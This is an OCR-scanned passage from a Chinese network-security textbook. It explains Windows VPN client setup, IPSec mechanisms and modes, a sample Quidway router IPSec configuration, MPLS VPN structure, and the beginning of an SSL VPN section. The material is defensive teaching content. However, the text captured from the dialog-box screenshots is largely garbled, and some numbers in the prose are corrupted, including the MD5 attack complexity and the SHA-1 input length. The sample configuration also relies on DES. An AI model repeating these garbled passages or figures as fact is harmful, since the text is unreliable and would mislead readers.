5.8 输入 公司 名 


新 建 连接 向 导 
公用 网 络 
indows 可 以 先 确 认 公用 网 络 是 否 已 接 好 。 做 
上 在 建立 虚拟 连接 之 前 可 以 自动 所 到 Internet 或 其 它 公用 网 络 的 初始 
口 不 拔 初 始 连 接 @@) 


〇 自动 热 此 初始 连接 4) 
加 














CEg[E3m 3 [了 








图 5.9 建立 初始 的 公用 网 络 连 接 


新 建 连接 向 导 
YPE 服务 器 选择 
YPN 服务 器 的 名 称 或 地 址 是 什么 ? 
输入 修正 连接 的 计算 机 的 主机 名 或 IP 地 址 。 


主机 名 或 IT 地 址 (to ，microsoft, com 或 157.54.0.1) 0D 
[vpn maaa edu oj 








图 5.10 指定 VPN 服务 器 地 址 
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在 图 5. 9 所 示 的 步骤 中 ,可 以 根据 用 户 当 前 连接 Internet 的 情况 选择 “不 拨 初 始 连 接 ” 
(已 提供 了 网 络 接 和 人 的 场合 ) 或 者 “自动 拨 此 初始 连接 ”( 从 下 拉 列 表 中 选择 设 定 的 拨号 连 
接 ) 。 若 选 “ 自 动 拨 此 初始 连接 ”, 可 以 在 如 图 5. 10 所 示 的 界面 中 输入 待 连接 的 VPN 服务 
器 地 址 ,输入 要 连接 的 VPN 服务 器 名 称 后 , 单 击 * 下 一 步 ?按钮 就 可 以 完成 VPN 连接 的 建 
立 。 下 面 将 对 该 连接 的 属性 进行 配置 。 

若 选 “ 不 拨 初始 连接 ”( 已 提供 了 网 络 接 人 的 场合 ) ,可 直接 进入 下 一 个 环节 ,输入 用 户 名 
和 保密 字 , 如 图 5. 11 所 示 。 

设置 VPN 属性 时 要 选择 “Internet 协议 (TCP/IP)” 复 选 框 ,如 图 5. 12 所 示 ,一 般 VPN 
服务 器 会 自动 为 连接 的 用 户 端 分 配 IP 地 址 。 










| 

常规 | 选项 | 安全 措施 网 络 | 共享 | 

我 正在 呼 咱 的 YPN 服务 器 的 类 型 EE); 

目 动 了 | 

ly WE 

此 连接 使 用 下 列 选 定 的 组 件 CC) ; 

器 于 mLink TFA/SPX/Ne BIOS Conpatible Transpo A 

回 玉 Internet 协议 CCP/IP) 

口 更 上 erosoft 网 络 的 文件 和 打印 机 共享 时 

[DB Apr IPsec 


省 
安装 中 着 寺中 陈 侍 三 










用 户 名 WW: [ehen 


密码 所; 
厂 保存 密码 E) 


取消 属性 Q) | 帮助 四 





描述 
允许 悠 的 计算 机 访问 出 crosoft 网 络 上 的 资源 | 





图 5.11 输入 VPN 账号 信息 图 5.12 设置 VPN 属性 


根据 VPN 服务 器 的 认证 要 求 ,可 以 从 图 5. 13 所 示 的 “安全 ”选项 卡 的 “安全 选项 ”中 单 
击 * 设 置 ?按钮 进行 具体 的 配置 ,如 图 5. 14 所 示 。 


a EE] 


富 规 | 选项 安全 | 网 各 | 高 级 | 





安全 选项 
个 典型 推荐 设置 ) 了 DD 


验证 我 的 身份 为 





厂 和 要求 数据 加 窗 吸 有 残 断 开 ) DOD) 


人 ITC 目 写 又 谎 辣 7@) 


要 使 用 这 些 设置 需要 有 安全 协议 的 知识 














图 5.13 设置 安全 选项 
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人 〇 使 用 可 扩展 的 身份 验证 协议 AP) 到) 


加 允许 这 些 协议 到 ) 
口 不 加 宕 的 客 码 FAP) QD) 


口 shivs 密码 身份 验证 协议 SPAP) (5) 
回 质询 握手 身份 验证 协议 CHAP) CC) 
DMicrosoft CHAP Ots-CHAP) OM) 


Et CHAP 版 本 2 DIS-CHAP v2) GD) 


MS-CHAP ， 目 开 Window: 和 : 
口 本 各 es 目 动 使 用 我 的 Windows 登录 名 和 富 码 











[确定 取消 








5. 14 “高 级 安全 设置 ?对话 框 


在 “安全 ”选项 卡 中 单 击 *IPSec 设置 ?按钮 ,可 以 对 用 于 身份 验证 的 预 共享 密 钥 进行 设 
置 ,如 图 5. 15 所 示 。 
经 过 以 上 步骤 ,用 户 可 以 连接 到 VPN 服务 器 ,访问 内 部 网 络 , 如 图 5. 16 所 示 。 


IPSec 设置 


口 使 用 预 共 享 的 密 角 作 身份 验证 WD 


pn nuoa. edu on, 
已 藉 开 ， 洒 防火 地 的 
> TA 微型 病 吕 DTPTP) 


图 5.15 IPSec 设置 图 5.16 VPN 客户 端的 设置 结果 





s.4 网 络 层 VPN 协议 


利用 隧道 方式 来 实现 VPN 时 ,除了 要 充分 考虑 隧道 的 建立 及 其 工作 过 程 之 外 ,另外 一 
个 重要 的 问题 是 隧道 的 安全 。 数 据 链 路 层 隧 道 协议 只 能 在 隧道 发 生 端 及 终止 端 进行 认证 及 
加 密 ,而 隧道 在 公 网 的 传输 过 程 中 并 不 能 完全 保证 安全 。 网 络 层 VPN 协议 则 在 隧道 两 端 
进行 数据 的 封装 ,从 而 保证 隧道 在 传输 过 程 中 的 安全 性 。 


5.4.1 IPSec 协议 


IPSec 协议 是 一 个 范围 广泛 、 开 放 的 虚拟 专用 网 安全 协议 。IPSec 是 第 三 层 VPN 协议 
标准 , 自 1995 年 问世 以 来 ,IETF 工作 组 已 制定 了 一 系列 标准 ,与 其 相关 的 RFC 文档 包括 
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RFC 2401 至 RFC 2409、RFC 2451 等 。 其 中 RFC 2409 是 Internet 的 密 钥 交换 (Internet 
Key Exchange,IKE) 协 议 ,RFC 2401 是 IPSec 协议 ,RFC 2402 是 关于 验证 包头 (Authority 
Header, AH) 的 协议 ,RFC 2406 是 关于 加 密 数 据 的 报 文安 全 封装 (Encapsulate Protocol) 协 
议 。IPSec 现在 还 不 完全 成 熟 , 但 它 得 到 了 一 些 路 由 器 厂商 和 硬件 厂商 的 大 力 支 持 。 预 计 
它 今后 将 成 为 虚拟 专用 网 的 主要 标准 。 

1997 年 年 底 ,IETF 安全 工作 组 完成 了 IPSec 的 扩展 ,在 IPSec 协议 中 加 上 ISAKMP 
(Internet Security Association and Key Management Protocol) 协 议 , 其 中 还 包括 一 个 密 钥 
分 配 协议 Oakley。ISAKMP/Oakley 支持 自动 建立 加 密 信道 、 密 钥 的 自动 安全 分 发 和 更 新 。 
IPSec 也 可 用 于 连接 其 他 层 已 存在 的 通信 协议 ,如 支持 安全 电子 交易 (Secure Electronic 
Transaction,SET) 协 议和 安全 套 接 字 层 (Secure Socket Layer, SSL) 协 议 。 即 使 不 用 SET 
或 SSL,IPSec 也 能 提供 认证 和 加 密 手段 以 保证 信息 的 传输 。 

IPSec 可 以 在 网 络 层 提供 加 密 、 验 证 ,授权 和 管理 ,其 密 钥 交换 、 核 对 数字 签名 、 加 密 等 
操作 都 在 后 台 自动 进行 ,对 用 户 透 明 。IPSec 用 密码 技术 从 3 个 方面 来 保证 数据 的 安全 : 

。 认证。 用 于 对 主机 和 端点 进行 身份 鉴别 。 

。 完整 性 检查 。 用 于 保证 数据 在 通过 网 络 传输 时 没有 被 修改 。 

。 加 密 。 通 过 加 密 IP 地 址 和 数据 以 保证 私有 性 。 

如 果 组 建 大 型 的 VPN, 则 需要 认证 中 心 进行 身份 认证 和 分 发 用 户 公 共 密 钥 。 

IPSec 使 用 灵活 ,支持 多 种 组 网 方式 ,可 以 应 用 于 主机 与 主机 、 主 机 与 网 关 以 及 网 关 与 
网 关 之 间 ,还 能 够 支持 用 户 远程 访问 。IPSec 最 适合 可 信 的 LAN 到 LAN 之 间 的 虚拟 专用 
网 , 即 内 部 网 虚拟 专用 网 。IPSec 可 以 和 L2TP 等 隧道 协议 一 起 使 用 ,给 用 户 提供 更 大 的 灵 
活性 和 可 靠 性 。 

IPSec 不 限制 加 密 或 认证 算法 、 密 钥 技 术 或 安全 算法 , 它 提供 了 实现 VPN 技术 的 标准 
框架 ,IPSec 的 安全 体系 结构 如 图 5. 17 所 示 。 
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1 
封装 安全 载荷 (ESP) | 认证 头 (AH) 
了 1 
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密 钥 交换 与 管理 (IKE) 一 一 一 安全 关联 (SA) 























图 5.17 IPSec 安全 体系 结构 


5.4.1.1 IPSec 的 主要 功能 

IPSec 不 是 具体 的 算法 ,而 是 提供 了 实现 VPN 的 标准 框架 。VPN 的 安全 机 制 本 质 上 
依托 于 密码 系统 ,其 中 各 种 算法 的 特性 、 密 钥 长 度 .应 用 模式 不 同 , 直 接 影响 在 VPN 上 提供 
的 安全 服务 的 强度 。 

IPSec 可 以 实现 下 列 主要 功能 。 
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1. 数据 加 密 


数据 加 密 可 以 提供 传输 的 保密 性 ,加 密 的 数据 即使 被 截获 ,内 容 也 无 法 直接 被 解读 。 
IPSec 并 没有 定义 某 种 特别 的 加 密 算 法 , 它 可 以 应 用 DES、3DES、AES 等 多 种 共享 密 钥 加 密 
算法 ,也 可 以 应 用 RSA 等 公 钥 加 密 算 法 。 

2. 数据 完整 性 

数据 完整 性 要 保证 在 传输 过 程 中 数据 没有 丢失 ,也 没有 被 删除 或 算 改 。VPN 中 的 数据 
要 通过 不 安全 的 网 络 传送 ,例如 因特网 ,这 些 数据 都 有 可 能 被 截获 或 被 修改 。 为 了 保证 数据 
的 完整 性 ,对 所 传输 的 数据 都 通过 Hash( 散 列 ) 函数 产生 一 个 散 列 ( 即 一 串 标记 数据 ) ,被 附 
加 在 数据 后 传 到 接收 方 ; 接收 方 也 用 同样 的 Hash 函数 产生 一 个 散 列 ,如 果 接 收 方 产生 的 
散 列 与 其 收 到 的 散 列 匹配 , 则 证 明 消 息 没 有 被 算 改 。 这 样 可 以 保证 原始 信息 的 完整 性 。 在 
IPSec 框架 中 保证 数据 完整 性 的 算法 主要 有 MD5 和 SHA-1。 

MD5 报 文 摘要 算法 (MD Standards for Message Digest,RFC 1321) 曾 是 使 用 最 为 广泛 
的 安全 散 列 算法 , 它 采 用 单 向 Hash 函数 将 明文 数据 按 512b 进行 分 组 ,分 别 “ 摘 要 ”成 长 度 
为 128b 的 密 文 , 亦 称 为 数字 指纹 (finger print)。 报 文摘 要 有 固定 的 长 度 , 不 同 的 明文 摘要 
成 密 文 的 结果 总 是 不 同 的 ,而 同样 的 明文 摘要 必定 一 致 。 因 此 , 报 文摘 要 便 可 成 为 验证 明文 
是 否 是 “ 真 身 ” 的 “指纹 ”。 

由 MD5 产生 的 报 文摘 要 中 的 每 一 位 和 输入 的 每 一 位 都 相关 ,也 就 是 说 : 如 果 输 入 的 数 
据 有 一 位 发 生 了 变化 ,那么 生成 的 报 文摘 要 就 会 有 很 大 的 不 同 。 近 年 来 , 随 着 密码 分 析 技术 
的 发 展 , 人 们 发 现 MD5 容易 遭受 强行 攻击 (如 生日 攻击 ) ,所 需 的 操作 数量 级 为 24 。 因 此 ， 
需要 具有 更 长 的 散 列 值 和 更 强 的 抗 密码 分 析 攻 击 的 散 列 函数 来 代替 MD5 算法 ,SHA-1 就 
是 一 种 候选 算法 。 

安全 散 列 算法 (Secure Hash Algorithm,SHA) 的 输入 报 文 最 大 长 度 为 (2%# 一 1)b, 按 
512b 分 组 处 理 , 输 出 160b 的 报 文摘 要 。SHA-1 与 MD5 最 大 的 区 别 在 于 其 摘要 比 MD5 摘 
要 长 32b, 因 此 ,SHA-1 对 于 强行 攻击 有 更 强 的 抵抗 能 力 。 但 由 于 SHA-1 的 循环 步骤 比 
MD5 多 且 要 处 理 的 缓存 大 ,所 以 ,SHA-1 的 运行 速度 比 MD5 慢 。 

3. 数据 源 认 证 

由 散 列 函数 产生 报 文摘 要 ,可 以 保证 报 文 数据 的 完整 性 ,但 不 提供 对 发 送 方 的 身份 认 
证 ,攻击 者 和 接收 方 都 可 以 伪造 报 文 , 而 发 送 方 也 可 以 因此 否认 发 出 过 报 文 。 数 据 源 认证 就 
是 要 确保 数据 发 送 方 不 能 否认 其 发 送 过 数据 。 

在 日 常生 活 中 ,亲笔 签名 、 盖 章 能 够 保障 文件 来 源 的 真实 性 ,而 在 网 络 环境 中 采用 的 是 
数字 签名 。 数 字 签 名 的 常用 方法 是 用 发 送 方 的 私 钥 加密 要 发 送 数 据 的 报 文 摘要 ,从 而 把 数 
据 与 其 发 送 者 连 在 一 起 。VPN 隧道 在 初始 建立 阶段 就 要 对 隧道 两 端的 用 户 进行 认证 。 认 
证 时 可 以 手工 预先 输入 每 一 对 用 户 的 预 共享 认证 密 钥 ,也 可 以 在 用 户 间 交换 数字 证 书 和 随 
机 数 (nonce)( 即 利用 RSA 的 数字 签名 ) 。 

4. 防 重 放 

IPSec 使 用 防 重 放 机 制 校 验 每 个 数据 分 组 是 否 唯一 , 防 重 放 机 制 通过 序号 来 保证 IP 分 
组 不 会 被 第 三 方 截获 ,并 在 修改 后 重新 插入 数据 流 。 如 果 接 收 方 收 到 重复 序号 的 分 组 , 则 直 
接 丢 弃 。 
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5.4.1.2 IPSec 的 安全 协议 


IPSec 的 安全 协议 主要 定义 对 通信 的 安全 保护 机 制 。IPSec 针对 不 同 的 需要 ,提供 了 
AH(Authentication Header, 认 证 头 ) 和 ESP(Encapsulating Security Payload ,封装 安全 净 
载 ) 两 种 安全 协议 。 

AH 机 制 主要 为 通信 提供 完整 性 保护 , 当 用 户 对 于 数据 的 保密 性 要 求 不 高 时 ,AH 能 够 
确保 数据 的 完整 性 ,提供 数据 源 认证 和 防 重 放 攻 击 功 能 ,但 AH 不 提供 加 密 功 能 ,数据 以 明 


文 传送 。AH 不 支持 网 络 地 址 转换 (NAT) 和 端口 地 址 转换 (PAT)。AH 头 的 格式 如 
图 5. 18 所 示 。 


认证 的 部 分 (IP 头 中 可 变 字段 除外 ) 












































IPv4 
原 IP 头 AH 头 TCP 头 数据 传输 模式 
下 二 负载 天 标 (8b) | ” 净 载 茶 长 度 (8b) 保 BtJ 
安全 参数 索引 (SPI) 
序列 导 
认证 数据 (2b 的 驶 数 从 











5.18 AH 头 的 格式 


ESP 机 制 能 够 确保 数据 的 完整 性 ,提供 数据 源 认证 ,数据 加 密 和 防 重 放 攻击 功能 。 如 
果 对 数据 的 保密 性 有 要 求 ,或 者 有 局 域 网 内 用 内 部 地 址 ,采用 了 NAT, 那 么 就 只 能 选择 
ESP。 应 用 ESP 时 ,接收 方 对 于 数据 分 组 先 认证 后 解密 ,可 以 降低 DoS 攻击 的 危险 。ESP 
头 的 格式 如 图 5. 19 所 示 。 

认证 的 部 分 J 

加 密 的 部 分 JPv4 
原 P 头 ] ESP | TCP 天 | 攻打 | ESP 必 | ESP 认 证 数据 | 传输 模式 
| 一 一 一 一 一 ee 
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安全 参数 索引 SPI(G32b) 

序列 号 G2b) 


ESP 净 载荷 ( 变 长 
填充 (0~255B) 


| 。 填充 长 度 (8b) ”| 下 一 负载 头 标 (8b) 
认证 数据 (长 度 可 变 ) 
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5.19 ESP 头 的 格式 


5.4.1.3 IPSec 隧道 的 操作 模式 

IPSec 协议 可 以 设置 成 在 两 种 模式 下 运行 : 隧道 模式 和 传输 模式 。 

1. 传输 模式 

如 图 5. 20 所 示 ,适合 点 到 点 的 连接 , 即 主机 与 主机 之 间 的 VPN 可 以 用 传输 模式 。 其 


数据 分 组 中 的 原始 IP 报头 保留 不 动 , 在 后 面 插入 AH 认证 头 或 ESP 的 头 部 和 尾部 , 仅 对 数 
据 净 荷 进行 认证 或 加 密 , 网 络 中 的 寻 址 直接 根据 数据 的 原始 IP 地 址 进行 。 
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经 认证 (加 密 ) 的 数据 原 IP 头 信息 


( 源 地 址 A 和 目的 地 址 B) 





















数据 |B |A 





















































B | A | 数据 
主机 A 组 主机 B 
[_ 原 IP 头 ”| TCP 头 和 数据 ] 原由 数据 包 
认证 的 部 分 ( 原 IP 头 的 可 变 字段 除外 ) 
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5. 20 IPSec 的 传输 模式 


2. 隧道 模式 

如 图 5. 21 所 示 ,适合 用 于 VPN 安全 网 关 之 间 的 连接 , 即 用 于 路 由 器 、 防 火 墙 \VPN 集 

中 器 等 网 络 设备 之 间 。 发 送 端的 VPN 安全 网 关 对 原始 IP 报 文 整体 加 密 , 再 在 前 面 加 入 一 
个 新 的 IP 包头 ,用 新 的 IP 地 址 (接收 端 VPN 的 地 址 ) 将 数据 分 组 路 由 到 接收 端 。 

YPN 网 关 经 认证 (加 密 ) 的 数据 ”VPN 隧道 VENR 关 
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新 IP 头 | ESP 头 ” 导 原 P 天 TCP 尖 下 数据 ESB 必 | ESP 认 证 数据 Esp 了 党 模 式 


















































图 5.21 IPSec 的 隧道 模式 


在 隧道 模式 下 ,IPSec 把 IPv4 数据 包 整 体 封装 中 ,可 以 保护 端 到 端的 安全 性 。 隧 道 模 
式 具 有 更 高 的 安全 性 ,但 也 会 带 来 较 大 的 系统 开销 。 另 外 ,采用 隧道 方式 时 ,是 对 整个 IP 数 
据 包 认证 或 加 密 , 即 隧道 协议 只 能 在 IP 协议 之 上 进行 ,这 种 模式 不 支持 其 他 网 络 协议 。 
5.4.1.4 IPSec 的 配置 
主机 之 间 的 IPSec 配置 如 下 : 
(1) 建立 VPN 连接 ,配置 其 属性 。 
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(2) 在 “常规 ”选项 卡 中 配置 目的 主机 的 名 字 或 者 IP 地 址 ,如 图 5. 22 所 示 。 
(3) 在 “网 络 ” 选 项 卡 中 选择 VPN 的 类 型 ,如 图 5. 23 所 示 。 


妆 规 | 选项 | 安全 | 网 络 | 高 级 | 





第 规 | 选项 | 安全 | 网络 | 高 级 | 
目的 地 的 主机 名 或 匡 地址 各 nicrosoft. com 或 
157.54.0.1) 加 





YPN 类 型 下 ) 
[202. 119. 64. 123 








第 一 次 连接 


在 试图 奸 立 虚构 连接 之 前 ，Windews 可 以 先 连 接 到 公用 
网 络 ， 如 Internet 上 。 





此 连接 使 用 下 列 项 目 @) 
回 轴 9os 数据 包 it 志 
口 先 拟 另 一 个 连接 仙 


出 
回 轧 中 crosoft 网 络 的 文件 和 打印 机 共享 
回力 Vware Bridge Protocol 
回 图 由 crosoft 网 络 客户 请 





属性 








揣 述 





TCP/IP 是 默认 的 广域网 协议 。 它 提供 跨越 多 种 也 联网 
/IP 协议 它 : 多 种 也 
回 连接 后 在 通知 区 域 显示 图 标 中 ) 

















Cj Cw] 








CCD ED 
图 5.22 输入 对 方 IP 地 址 


图 5.23 选择 VPN 类 型 


(4) 在 “安全 ”选项 卡 中 单 击 "IPSec 设置 ?按钮 ,如 图 5. 24 所 示 ,可 以 预先 设 定 预 共 享 密 
钥 用 作 身 份 认证 ,如 图 5. 25 所 示 。 


各 HL_vpn 属性 
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图 5.24 进入 IPSec 设 置 图 5.25 设置 预 共享 密 钥 
网 关 之 间 的 IPSec 主要 用 于 内 联网 VPN ,充当 安全 网 关 的 通常 是 路 由 器 或 防火 墙 。 下 
面 以 路 由 器 作为 安全 网 关 ,简单 说 明 配置 IPSec 的 主要 步骤 。 


如 图 5. 26 所 示 ,RouterA 连接 广域网 的 端口 IP 地 址 为 172. 16. 20. 1,RouterB 连接 广 
域 网 的 端口 IP 地 址 为 172. 20. 1. 1 。 
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RouterA RouterB 


图 5.26 网 关 之 间 的 VPN 


在 RouterA 上 与 IPSec 相关 的 主要 配置 如 下 : 
。 创建 名 为 rule-1 的 安全 提议 : 


ipsec proposal rule-1 
。 报 文 的 封装 采用 隧道 模式 : 
encapsulation-mode tunnel 

。 安全 协议 采用 ESP: 

transform esp-new 

。 加 密 算法 采用 DES: 

esp encryption-algorithm des 

。 认证 算法 选择 SHA1-HMAC-96: 
esp authentication-algorithm shal-hmac-96 


。 创建 名 为 mymap 的 安全 策略 。 采 用 预 共享 密 钥 的 认证 方法 , 密 钥 为 mymap, 协 商 
方式 为 ISAKMP: 


ipsec policy mymap 10 isakmp 

。 设置 访问 控制 列表 ,规则 号 为 1000: 

acl 1000 match-order auto 

。 配置 本 端 内 网 允许 访问 对 端 内 网 ,规则 可 以 根据 用 户 需求 任意 修改 : 

rule normal permit ip source 172.16.0.0 0.0.255.255 destination 172.20.0.0 0.0.255.255 
。 配置 对 端 内 网 允许 访问 本 端 内 网 ,规则 可 以 根据 用 户 需求 任意 修改 : 

rule normal permit ip source 172.20.0.0 0.0.255.255 destination 172.16.0.0 0.0.255.255 
。 禁止 其 他 任何 报 文 : 

rule normal deny ip source any destination any 

。 引用 访问 列表 : 

security acl 1000 

。 引用 rule-l 的 安全 提议 : 


proposal rule-1 


166 网 络 安全 





。 设置 对 端 地 址 : 

tunnel remote 172.20.1.1 

。 在 接口 上 应 用 相应 的 安全 策略 : 
ipsec policy mymap 


RouterB 上 的 设置 步骤 与 RouterA 相同 ,只 是 对 端 地 址 ,访问 控制 列表 中 的 源 地 址 和 目 
的 地 址 需要 相应 修改 。 

注意 : 不 同 厂家 、 不 同型 号 的 路 由 器 防火墙 在 具体 的 配置 命令 上 都 可 能 存在 一 定 的 差 
异 ,此 处 采用 的 是 Quidway 的 路 由 器 命令 ,VRP 版 本 号 为 3.4。 在 使 用 具体 设备 时 ,要 参考 
设备 的 命令 手册 进行 配置 。 


5.4.2 MPLS 


多 协议 标记 交换 (Multi-Protocol Label Switch,MPLS) 是 一 种 用 于 快速 数据 包 交 换 和 
路 由 的 体系 , 它 独立 于 第 二 层 和 第 三 层 协议 ,能够 管理 各 种 不 同形 式 的 通信 流 。MPLS 提供 
了 一 种 将 IP 地 址 映射 为 简单 的 .具有 固定 长 度 的 标签 的 机 制 , 可 用 于 不 同 的 数据 分 组 转发 
和 交换 技术 。 

在 MPLS 中 ,数据 传输 发 生 在 标签 交换 路 径 (Label Switch Path,LSP) 上 。LSP 是 每 一 
个 沿 着 从 源 端 到 终端 的 路 径 上 的 各 个 节点 的 标签 序列 。 

标签 分 发 协议 (Label Distribution Protocol, LDP) 还 包括 资源 预 留 协议 (Resource 
Reservation Protocol,RSVP) ,以 及 建立 在 路 由 协议 之 上 的 边界 网 关 协 议 (Border Gateway 
Protocol,BGP) 及 开放 最 短路 径 协议 (Open Shortest Path First,OSPF)。 这 些 固定 长 度 的 
标签 被 插入 每 一 个 数组 分 组 的 首部 ,可 由 硬件 实现 快速 交换 。 

将 根据 标记 交换 转发 数据 与 网 络 层 的 IP 路 由 相 结合 ,可 以 加 快 数据 分 组 的 转发 速度 。 
MPLS 可 以 运行 在 任何 链接 层 技术 之 上 ,从 而 简化 向 SONET/SDH 等 下 一 代 同 步 光 网 络 的 
转化 。 

MPLS 相关 协议 组 包括 以 下 协议 : 

。 MPLS 的 相关 信 令 协议 ,如 OSPF、BGP 等 。 

。，LDP: 标签 分 发 协议 。 

。 CR-LDP: 基于 路 由 受 限 标签 分 发 协议 (Constraint-Based LDP) 。 

。 RSVP-TE: 基于 流量 工程 扩展 的 资源 预 留 协 议 (Resource Reservation Protocol- 

Traffic Engineering) 。 
MPLS 节点 的 基本 体系 结构 如 图 5. 27 所 示 。 
5.4.2.1 MPLS VPN 的 组 成 


MPLS VPN 是 指 采用 MPLS 技术 在 IP 网 络 上 构建 企业 的 专 网 ,实现 跨 地 域 .安全 、 高 
速 而 可 靠 的 数据 、 请 音 和 图 像 等 多 业务 通信 ,为 用 户 提供 高 质量 的 数据 传输 服务 。 
MPLSVPN 网 络 主要 由 CE、PE 和 了 三 大 部 分 组 成 ,如 图 5. 28 所 示 。 
。 用 户 网 络 边缘 路 由 器 (Custom Edge Router,CE) 直接 与 服务 提供 商 网 络 相 连 , 它 感 
知 不 到 VPN 的 存在 。 
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5.27 MPLS 节点 的 基本 体系 结构 
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5.28 MPLS VPN 网 络 的 组 成 


。 骨干 网 边缘 路 由 器 (Provider Edge Router,PE) 与 用 户 的 CE 直接 相连 ,负责 VPN 
业务 接 人 ,处 理 VPN-IPv4 路 由 ,是 MPLS 三 层 VPN 的 主要 实现 者 。 

。 骨干 网 核心 路 由 器 (Provider Router,P) 负 责 快速 转发 数据 ,不 与 CE 直接 相连 。 

在 MPLS VPN 中 ,P、PE 设备 需要 支持 MPLS 的 基本 功能 ,CE 设备 不 必 支 持 MPLS。 

MPLS VPN 的 网 络 采用 标签 交换 ,一 个 标签 对 应 一 个 用 户 数据 流 , 便 于 隔离 用 户 间 的 
数据 ; MPLS 可 以 最 大 限度 地 优化 配置 网 络 资源 ,自动 地 快速 修复 网 络 故障 ,提供 高 可 用 性 
和 高 可 靠 性 。MPLS 目前 已 广泛 用 于 高 质量 的 数据 、 语 音 和 视频 相 融 合 的 多 业务 传送 ,以 此 
为 基础 ,MPLS VPN 在 灵活 性 ,扩展 性 及 安全 性 等 各 方面 也 有 着 较 大 的 优势 。 

5.4.2.2 MPLS 栈 

MPLS 标签 被 插入 到 第 二 层 报 头 和 第 三 层 IP 分 组 之 间 ,如 图 5. 29 所 示 。 


MPLS 标签 具体 包括 下 列 内 容 : 
”标签 。20b。 当 路 由 器 接收 到 一 个 有 标签 的 数据 包 时 ,可 以 查 出 其 栈 顶 部 的 标签 值 ， 


系统 从 中 了 解 到 : 该 数据 包 将 被 转发 的 下 一 跳 ; 在 转发 之 前 标签 栈 上 可 能 执行 的 操 
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图 5.29 MPLS 标 签 


作 , 如 返回 到 标签 进 栈 顶 入 口 同 时 将 一 个 标签 压 出 栈 , 或 返回 到 标签 进 栈 顶 和 人口 后 
将 一 个 或 多 个 标签 推进 栈 。 

。 服务 类 信息 。3b ,也 叫做 实验 位 ,用 于 在 分 组 通过 网 络 时 使 用 的 排队 和 丢弃 算法 。 

。 堆栈 底 。1b, 用 于 支持 标记 堆栈 序列 ， 

。 存活 时 间 (TTL)。8b, 提 供 传统 的 IP 生存 周期 功能 。 

5.4.2.3 标签 转发 表 产生 过 程 

标签 转发 表 产 生 过 程 如 下 : 

(1) 路 由 器 之 间 通 过 IP 路 由 协议 或 静态 路 由 产生 正常 的 路 由 表 。 

(2) 运行 MPLS 的 路 由 器 控制 程序 为 路 由 表 中 的 路 由 分 配 标签 。 

(3) 通过 LDP/RSVP 协议 发 现 该 路 由 器 的 MPLS 邻居 。 

(4) 将 打 标 签 的 路 由 通告 给 其 MPLS 邻居 。 

(5) 路 由 器 将 其 下 一 跳 路 由 器 通告 的 标签 加 到 其 转发 表 中 。 

通常 ,在 实际 应 用 中 路 由 器 将 目的 地 址 不 是 本 地 的 IP 包 转 发 给 其 下 一 跳 。 因 此 在 
MPLS 中 ,路 由 器 只 将 其 下 一 跳 路 由 器 通告 的 标签 加 到 其 转发 表 中 。 

5.4.2.4 ”IP 分 组 转发 过 程 

如 图 5. 29 所 示 , IP 分 组 在 MPLS 路 由 器 间 转 发 的 过 程 如 下 : 

(1) MPLS 入 口 路 由 器 根据 目的 地 址 查找 路 由 表 , 找 到 其 下 一 跳 路 由 器 的 转发 标签 。 

(2) 将 该 IP 分 组 打上 标签 ,转发 给 下 一 跳 路 由 器 。 

(3) 下 一 跳 路 由 器 查找 其 MPLS 标签 转发 表 , 替 换 分 组 中 原 有 的 标签 后 ,继续 转发 。 当 
打 有 标签 的 IP 包 到 达 某 路 由 器 时 ,分 组 中 上 一 站 路 由 器 的 出 站 标签 对 应 当前 路 由 器 的 入 站 
标签 。 路 由 器 不 再 根据 目的 地 址 查找 路 由 表 , 而 是 根据 标签 查找 MPLS 标签 转发 表 , 选 择 
出 站 的 通路 。 

(4) 转发 动作 持续 进行 ,直至 到 达 出 口 路 由 器 。 出 口 路 由 器 根据 分 组 的 目的 地 址 查找 
其 MPLS 标签 转发 表 , 发 现 自身 就 是 目的 地 址 ,于 是 弹出 标签 , 送 给 相应 端口 处 理 , 标 签 交 
换 过 程 结 束 。 

5.4.2.5 VPN 在 MPLS 中 的 实现 

根据 MPLS VPN 网 络 的 组 成 可 知 ,实现 MPLS VPN 主要 依赖 骨干 网 边缘 路 由 器 (PE) 
和 骨干 网 核心 路 由 器 (P) 。 在 图 5. 30 中 ,RA 为 核心 路 由 器 ,RB 和 RC 为 边缘 路 由 器 ,RB 
和 RC 上 分 别 有 两 个 VPN。192. 168. 10. 254/24 和 192. 168. 11. 254/24 属于 VPN-1,192. 
168. 20. 254/24 和 192. 168. 21. 254/24 属于 VPN-2。 

要 求 同 一 VPN 内 部 可 以 互通 ,不 同 VPN 间 不 能 互通 。 
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各 个 路 由 器 的 主要 配置 要 求 如 下 ,具体 的 命令 与 设备 的 厂家 和 型 号 有 关 , 可 参阅 相关 产 
品 手册 。 


VPN-1:192.168.10.254/24 VPN-1:192.168.11.254/24 
VPN-2:192.168.20.254/24 VPN-2:192.168.21.254/24 


图 5.30 ”MPLS VPN 配置 拓扑 


RA 需要 进行 下 列 配置 : 

。 全 局 使 能 MPLS。 

。 使 能 LDP。 

。 在 与 RB 和 RC 的 接口 上 使 能 MPLS。 

。 在 与 RB 和 RC 的 接口 上 使 能 LDP。 

。 启动 动态 路 由 协议 OSPF ,在 与 RB、RC 的 接口 上 分 别 使 能 OSPF。 
RB 和 RC 上 需要 进行 的 配置 如 下 : 

。 全 局 使 能 MPLS。 

。 使 能 LDP。 

。 创建 VPN-1 的 实例 。 

。 创建 VPN-2 的 实例 。 

。 在 与 RA 的 接口 上 使 能 MPLS。 

。 在 与 RA 的 接口 上 使 能 LDP。 

。 在 本 地 接口 上 分 别 绑 定 VPN-1 和 VPN-2 的 地 址 。 

取消 BGP 同步 后 ,将 VPN-1 和 VPN-2 分 别 与 MBGP 地 址 族 关联 。 


5.5 ”传输 层 VPN 协议 : SSL 


1994 年 Netscape 开发 了 SSL 协议 ,用 于 网 络 传输 层 与 应 用 层 之 间 的 安全 连接 技术 , 当 
时 专门 用 于 保护 Web 通信 。SSL 基于 RSA 公 钥 算法 ,通过 数字 签名 和 数字 证 书 等 来 实现 
Web 浏览 器 与 服务 器 之 间 的 身份 认证 和 加 密 数 据 传 输 , 进 而 确保 数据 在 网 络 传输 过 程 中 不 
会 被 截取 及 窃听 。 

SSL 2. 0 基本 解决 了 Web 的 安全 问题 。1997 年 IETF 发 布 了 TLS 1.0(Transport Layer 
Security, 也 被 称 为 SSL 3. 1) 的 草案 ,微软 公司 也 宣布 与 Netscape 一 起 支持 TLS 1. 0。 

SSL VPN 即 指 采 用 SSL 协议 来 实现 远程 接 入 的 VPN 技术 。SSL 协议 包括 服务 器 认 
